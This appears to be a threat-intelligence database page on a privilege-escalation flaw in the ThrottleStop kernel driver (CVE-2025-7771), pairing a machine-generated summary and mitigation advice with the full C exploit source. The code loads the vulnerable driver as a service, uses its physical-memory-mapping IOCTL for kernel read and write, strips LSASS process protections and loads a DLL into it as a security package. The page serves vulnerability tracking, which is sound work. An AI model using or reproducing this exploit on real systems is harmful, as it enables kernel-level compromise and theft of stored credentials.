Throttlestop Kernel Driver - Kernel Out-of-Bounds Write Privilege Escalation
A local privilege escalation vulnerability exists in the Throttlestop kernel driver due to an out-of-bounds write condition. Exploit code is publicly available in C language. This vulnerability allows a local attacker to escalate privileges by writing outside the intended memory bounds in kernel mode.
AI Analysis
Technical Summary
The Throttlestop kernel driver contains a vulnerability involving an out-of-bounds write in kernel space, which can be exploited locally to escalate privileges. The exploit leverages improper bounds checking in the driver, enabling an attacker with local access to write beyond allocated memory regions in kernel mode, potentially gaining elevated system privileges. Public exploit code is available in C, indicating proof-of-concept exploitation is possible. No specific affected versions or patch information is provided.
Potential Impact
Successful exploitation results in local privilege escalation, allowing an attacker to gain higher privileges on the affected system. This can lead to full system compromise depending on the privileges obtained. There is no indication of remote exploitation or widespread active exploitation in the wild at this time.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is available, restrict local access to trusted users only and monitor for suspicious local activity. No official patch or workaround information is provided in the current data.
Indicators of Compromise
- exploit-code: # Exploit Title: Throttlestop Kernel Driver - Kernel Out-of-Bounds Write Privilege Escalation # Exploit Details: https://xavibel.com/2025/12/22/using-vulnerable-drivers-in-red-team-exercises/ # Date: 8/12/2025 # Exploit Author: Xavi Beltran # Vendor Homepage: https://www.techpowerup.com/download/techpowerup-throttlestop/ # Version: 3.0.0.0 # Tested on: Windows 11 # CVE-2025-7771 #define WIN32_NO_STATUS #define SECURITY_WIN32 #include <Windows.h> #include <Psapi.h> #include <superfetch/superfetch.h> #include <tlhelp32.h> #include <string> #include <sspi.h> # define IOCTL_MMMAPIOSPACE 0x8000645C #pragma comment(lib, "Secur32.lib") #pragma pack(push,1) typedef struct { ULONGLONG PhysicalAddress; // +0 DWORD NumberOfBytes; // +8 } PHYS_REQ; // 0x0C #pragma pack(pop) // Struct needed to call nt!NtQueryIntervalProfile typedef NTSTATUS(WINAPI* NtQueryIntervalProfile_t)(IN ULONG ProfileSource, OUT PULONG Interval); LPVOID GetBaseAddr(LPCWSTR drvname) { LPVOID drivers[1024]; DWORD cbNeeded; int nDrivers, i = 0; if (EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded) && cbNeeded < sizeof(drivers)) { WCHAR szDrivers[1024]; nDrivers = cbNeeded / sizeof(drivers[0]); for (i = 0; i < nDrivers; i++) { if (GetDeviceDriverBaseName(drivers[i], szDrivers, sizeof(szDrivers) / sizeof(szDrivers[0]))) { if (wcscmp(szDrivers, drvname) == 0) { return drivers[i]; } } } } return 0; } uint64_t xRead(HANDLE hDrv, uint64_t virt_addr) { auto mm = spf::memory_map::current(); if (!mm) { printf("[!] Superfetch init failed!\n"); return 0; } auto phys = mm->translate((void*)virt_addr); if (!phys) { printf("[!] Translate failed for VA %p!\n", (void*)virt_addr); return 0; } //printf("[+] Virtual Adress=0x%016llx -> Physical Address 0x%016llx\n", virt_addr, phys); // --- PHYSICAL READ --- PHYS_REQ in{}; in.PhysicalAddress = phys; in.NumberOfBytes = 0x8; ULONGLONG out = 0; DWORD br = 0; BOOL ok = DeviceIoControl(hDrv, IOCTL_MMMAPIOSPACE, &in, sizeof(in), // 0x0C &out, sizeof(out), // Accepts 4 or 8 &br, nullptr); //printf("[+] IOCTL OK=%d, br=%lu, err=%lu, Mapped Memory Ptr=0x%llx\n", ok, br, GetLastError(), (unsigned long long)out); if (ok && br == 8 && out) { ULONGLONG result = *(volatile ULONGLONG*)(uintptr_t)out; // 8 bytes exactos printf("[+] READ WHERE: 0x%016llx | CONTENT: 0x%016llx\n", (unsigned long long)virt_addr, (unsigned long long)result); return result; } return -1; } uint64_t xWrite(HANDLE hDrv, uint64_t where, uint64_t what) { auto mm = spf::memory_map::current(); if (!mm) { printf("[!] Superfetch init failed!\n"); return 0; } auto phys = mm->translate((void*)where); if (!phys) { printf("[!] Translate failed for VA %p!\n", (void*)where); return 0; } //printf("[+] Virtual Adress=0x%016llx -> Physical Address 0x%016llx\n", where, phys); PHYS_REQ in{}; in.PhysicalAddress = phys; in.NumberOfBytes = 0x8; ULONGLONG out = 0; DWORD br = 0; BOOL ok = DeviceIoControl(hDrv, IOCTL_MMMAPIOSPACE, &in, sizeof(in), // 0x0C &out, sizeof(out), // 8 (Accepts 4 or 8) &br, nullptr); //printf("[+] IOCTL OK=%d, br=%lu, err=%lu, Mapped Memory Ptr=0x%llx\n", ok, br, GetLastError(), (unsigned long long)out); if (ok && br == 8 && out) { ULONGLONG result = *(volatile ULONGLONG*)(uintptr_t)out; // 8 bytes exactos } // WRITE printf("[+] WRITE WHAT: 0x%016llx | WHERE: 0x%016llx\n", (unsigned long long)what, (unsigned long long)where); *(uint64_t*)out = what; return 0; } DWORD FindProcessId(const std::wstring& processName) { DWORD processId = 0; HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if (snapshot == INVALID_HANDLE_VALUE) return 0; PROCESSENTRY32W entry; entry.dwSize = sizeof(PROCESSENTRY32W); if (Process32FirstW(snapshot, &entry)) { do { if (!_wcsicmp(entry.szExeFile, processName.c_str())) { processId = entry.th32ProcessID; break; } } while (Process32NextW(snapshot, &entry)); } CloseHandle(snapshot); return processId; } int main() { DWORD lsassPid = FindProcessId(L"lsass.exe"); printf("[+] Target process PID: %d\n", lsassPid); //Installing the service SC_HANDLE hSCManager; SC_HANDLE hService; // Open the Service Control Manager hSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_CREATE_SERVICE); if (hSCManager == NULL) { printf("[!] Error opening SCM: %lu\n", GetLastError()); return 1; } // Create the service hService = CreateService( hSCManager, L"ThrottleStop", L"ThrottleStop", SERVICE_ALL_ACCESS, SERVICE_KERNEL_DRIVER, SERVICE_AUTO_START, SERVICE_ERROR_NORMAL, L"C:\\Users\\Public\\a.sys", NULL, NULL, NULL, NULL, NULL); if (hService == NULL) { printf("[+] Error creating service: %lu\n", GetLastError()); CloseServiceHandle(hSCManager); //return 1; } printf("[!] Service created successfully.\n"); if (!StartService(hService, 0, NULL)) { printf("[!] Error starting the service: %lu\n", GetLastError()); } else { printf("[+] Service started correctly.\n"); } LPVOID nt_base = GetBaseAddr(L"ntoskrnl.exe"); printf("[+] NT base: %p\n", nt_base); HANDLE hDrv = NULL; hDrv = CreateFileA("\\\\.\\ThrottleStop", (GENERIC_READ | GENERIC_WRITE), 0x00, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (hDrv == INVALID_HANDLE_VALUE) { printf("[-] Failed to get a handle on driver!\n"); return -1; } else { printf("[+] Handle on driver received!\n"); } ULONGLONG result = 0x0; // nt!PsInitialSystemProcess nt + 0x5412e0 ULONGLONG system_eprocess = ULONGLONG(nt_base) + 0x5412e0; DWORD64 Eprocess = xRead(hDrv, (uint64_t)system_eprocess); printf("[+] EPROCESS: 0x%llX\n", Eprocess); DWORD64 CurrentProcessPid = xRead(hDrv, (uint64_t)system_eprocess + 0x2e0); // +0x2e0 UniqueProcessId : Ptr64 Void DWORD64 SearchProcessPid = 0; DWORD64 searchEprocess = Eprocess; while (1) { searchEprocess = xRead(hDrv, (uint64_t)searchEprocess + 0x2e8) - 0x2e8; // +0x2e8 ActiveProcessLinks : _LIST_ENTRY SearchProcessPid = xRead(hDrv, (uint64_t)searchEprocess + 0x2e0); // +0x2e0 UniqueProcessId : Ptr64 Void if (SearchProcessPid == lsassPid) // LSASS PROCESS { break; } } printf("[+] Found LSASS EPROCESS!\n"); printf("[+] Removing PPL Protection...\n"); xWrite(hDrv, (uint64_t)searchEprocess + 0x6ca, 0x0); // +0x6ca Protection : _PS_PROTECTION printf("[+] Removing Signature Level Protection...\n"); xWrite(hDrv, (uint64_t)searchEprocess + 0x6c8, 0x0);// +0x6c8 Protection : SignatureLevel : UChar printf("[+] LSASS protections disabled\n"); CloseHandle(hDrv); SECURITY_PACKAGE_OPTIONS spo = {}; SECURITY_STATUS ss = AddSecurityPackageA((LPSTR)"c:\\windows\\system32\\ntssp.dll", &spo); printf("[+] DLL Injection successful!\n"); return 0; }
Throttlestop Kernel Driver - Kernel Out-of-Bounds Write Privilege Escalation
Description
A local privilege escalation vulnerability exists in the Throttlestop kernel driver due to an out-of-bounds write condition. Exploit code is publicly available in C language. This vulnerability allows a local attacker to escalate privileges by writing outside the intended memory bounds in kernel mode.
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
The Throttlestop kernel driver contains a vulnerability involving an out-of-bounds write in kernel space, which can be exploited locally to escalate privileges. The exploit leverages improper bounds checking in the driver, enabling an attacker with local access to write beyond allocated memory regions in kernel mode, potentially gaining elevated system privileges. Public exploit code is available in C, indicating proof-of-concept exploitation is possible. No specific affected versions or patch information is provided.
Potential Impact
Successful exploitation results in local privilege escalation, allowing an attacker to gain higher privileges on the affected system. This can lead to full system compromise depending on the privileges obtained. There is no indication of remote exploitation or widespread active exploitation in the wild at this time.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is available, restrict local access to trusted users only and monitor for suspicious local activity. No official patch or workaround information is provided in the current data.
Technical Details
- Edb Id
- 52512
- Has Exploit Code
- true
- Code Language
- c
Indicators of Compromise
Exploit Source Code
Exploit code for Throttlestop Kernel Driver - Kernel Out-of-Bounds Write Privilege Escalation
# Exploit Title: Throttlestop Kernel Driver - Kernel Out-of-Bounds Write Privilege Escalation # Exploit Details: https://xavibel.com/2025/12/22/using-vulnerable-drivers-in-red-team-exercises/ # Date: 8/12/2025 # Exploit Author: Xavi Beltran # Vendor Homepage: https://www.techpowerup.com/download/techpowerup-throttlestop/ # Version: 3.0.0.0 # Tested on: Windows 11 # CVE-2025-7771 #define WIN32_NO_STATUS #define SECURITY_WIN32 #include <Windows.h> #include <Psapi.h> #include <superfetch/superfet... (7173 more characters)
Threat ID: 69ec2f5087115cfb68b9e9d2
Added to database: 4/25/2026, 3:04:48 AM
Last enriched: 4/25/2026, 3:04:52 AM
Last updated: 4/25/2026, 7:48:47 AM
Views: 5
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.